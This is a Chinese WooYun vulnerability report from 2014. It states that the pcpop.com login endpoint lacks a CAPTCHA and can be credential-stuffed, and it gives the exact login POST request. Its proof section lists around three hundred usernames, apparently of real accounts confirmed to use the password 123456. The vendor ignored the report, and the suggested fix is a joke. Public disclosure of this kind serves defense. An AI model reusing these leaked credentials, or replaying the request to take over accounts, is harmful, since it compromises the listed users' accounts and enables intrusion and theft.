当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-089255

漏洞标题:泡泡网接口未设置验证码可撞库

相关厂商:泡泡网

漏洞作者: 花心h

提交时间:2014-12-30 09:54

修复时间:2015-01-04 09:56

公开时间:2015-01-04 09:56

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-30: 细节已通知厂商并且等待厂商处理中
2015-01-04: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

1

详细说明:

登陆点:http://uc.pcpop.com/uc_login.php?returnurl=http://www.pcpop.com
发送包:
POST /suc/action/login.php?action=loginbyusername&t=1419400988155 HTTP/1.1
Host: uc.pcpop.com
Proxy-Connection: keep-alive
Cache-Control: no-cache
Origin: http://uc.pcpop.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://uc.pcpop.com/uc_login.php?returnurl=http%3A%2F%2Fwww.pcpop.com%2F%3F%26r%3D0.45516037568449974
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: __pta=1145578403.1419136160.1419136160.1419400978.1; __pts=83578497; __ptb=83578497; Hm_lvt_4875cc4ab76a7d7c11c93855dfbdfcdd=1419136159,1419400979; Hm_lpvt_4875cc4ab76a7d7c11c93855dfbdfcdd=1419400979; __utmt=1; __utma=61410867.11036304.1419136159.1419136159.1419400979.2; __utmb=61410867.1.10.1419400979; __utmc=61410867; __utmz=61410867.1419400979.2.2.utmcsr=baidu|utmccn=(organic)|utmcmd=organic|utmctr=%E6%B3%A1%E6%B3%A1%E7%BD%91
Content-Length: 25
loginname=111&password=123456

漏洞证明:

泡泡网.png


jocelyne 123456
mojiezuo 123456
lijiejie 123456
annetta 123456
decayed 123456
gardens 123456
ingemar 123456
panning 123456
roobbie 123456
susanne 123456
qwerty12 123456
lifting 123456
linguet 123456
looksee 123456
majerle 123456
nikolas 123456
philipa 123456
brulee 123456
eyeing 123456
geneen 123456
meteor 123456
teenie 123456
romain 123456
sarina 123456
wangjy 123456
belick 123456
bibble 123456
binder 123456
carley 123456
chitak 123456
decnet 123456
fausto 123456
floral 123456
florry 123456
grayed 123456
huther 123456
kalina 123456
maoris 123456
niding 123456
pasang 123456
passer 123456
riping 123456
shikar 123456
snivel 123456
aneurin 123456
fordham 123456
goldwin 123456
kaisers 123456
culver 123456
meagan 123456
123175 123456
197510 123456
310227 123456
328117 123456
441925 123456
750218 123456
771224 123456
781115 123456
781231 123456
828828 123456
830820 123456
braves 123456
andres 123456
aristo 123456
lovable 123456
massine 123456
pizzazz 123456
adieu 123456
buyer 123456
accel 123456
adala 123456
adali 123456
addda 123456
adina 123456
agama 123456
aimil 123456
alani 123456
aliza 123456
amate 123456
angra 123456
apace 123456
arian 123456
ariki 123456
asine 123456
assen 123456
atila 123456
badan 123456
bange 123456
basti 123456
betas 123456
bilge 123456
cacan 123456
cader 123456
caius 123456
caoba 123456
caulk 123456
cheme 123456
cicer 123456
cloes 123456
cloze 123456
cocas 123456
cocke 123456
cocle 123456
comfy 123456
conga 123456
coven 123456
crowe 123456
cyane 123456
debra 123456
denys 123456
derte 123456
derth 123456
dibai 123456
diety 123456
divan 123456
dotes 123456
duval 123456
eaton 123456
elsah 123456
enola 123456
ethyl 123456
fanga 123456
farcy 123456
flirt 123456
forli 123456
fream 123456
galla 123456
gally 123456
geest 123456
grape 123456
grego 123456
grobe 123456
grote 123456
guage 123456
guiba 123456
halli 123456
hamal 123456
hemol 123456
herbe 123456
hider 123456
houss 123456
hupeh 123456
infin 123456
isbel 123456
jalee 123456
krone 123456
lesli 123456
looks 123456
patri 123456
saxon 123456
shoji 123456
sling 123456
sposi 123456
halli 123456
tessy 123456
thang 123456
unger 123456
warty 123456
adina 123456
aimil 123456
aliza 123456
unname 123456
benoit 123456
debell 123456
disuse 123456
nasion 123456
wilder 123456
lesli 123456
maire 123456
saxon 123456
tessy 123456
123698 123456
52330 123456
myths 123456
benoit 123456
bedlar 123456
bosom 123456
bouet 123456
cadee 123456
cares 123456
lauer 123456
liken 123456
lubes 123456
madia 123456
monon 123456
needs 123456
geer 123456
halm 123456
hayz 123456
irma 123456
jule 123456
mals 123456
nixy 123456
pari 123456
swim 123456
tats 123456
tens 123456
wana 123456
weri 123456
wist 123456
tenne 123456
abra 123456
aivr 123456
alys 123456
amil 123456
aute 123456
babs 123456
ccta 123456
coll 123456
dams 123456
dato 123456
dogy 123456
oceanstar 123456
1349 123456
6376 123456
8732 123456
8736 123456
wrt 123456
guri 123456
jarp 123456
jiti 123456
sdrs 123456
sldc 123456
stk 123456
tpk 123456
angl 123456
dase 123456
riccardo 123456
1223 123456
1425 123456
1201 123456
19800402 123456
19970701 123456
opqw 123456
teachers 123456
ingemar 123456
adp 123456
nob 123456
annetta 123456
lantana 123456
algeria 123456
anatman 123456
bandido 123456
blocker 123456
bobstay 123456
bootman 123456
bravely 123456
cabezon 123456
castell 123456
catania 123456
chaille 123456
chanche 123456
chuckle 123456
dolours 123456
dominik 123456
doughty 123456
ducking 123456
edgardo 123456
forland 123456
frabbit 123456
funding 123456
gaiting 123456
gualala 123456
harking 123456
helming 123456
joining 123456
juggins 123456
klipdas 123456
knuckly 123456
landers 123456
loveday 123456

修复方案:

你们懂的

版权声明:转载请注明来源 花心h@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-01-04 09:56

厂商回复:

最新状态:

暂无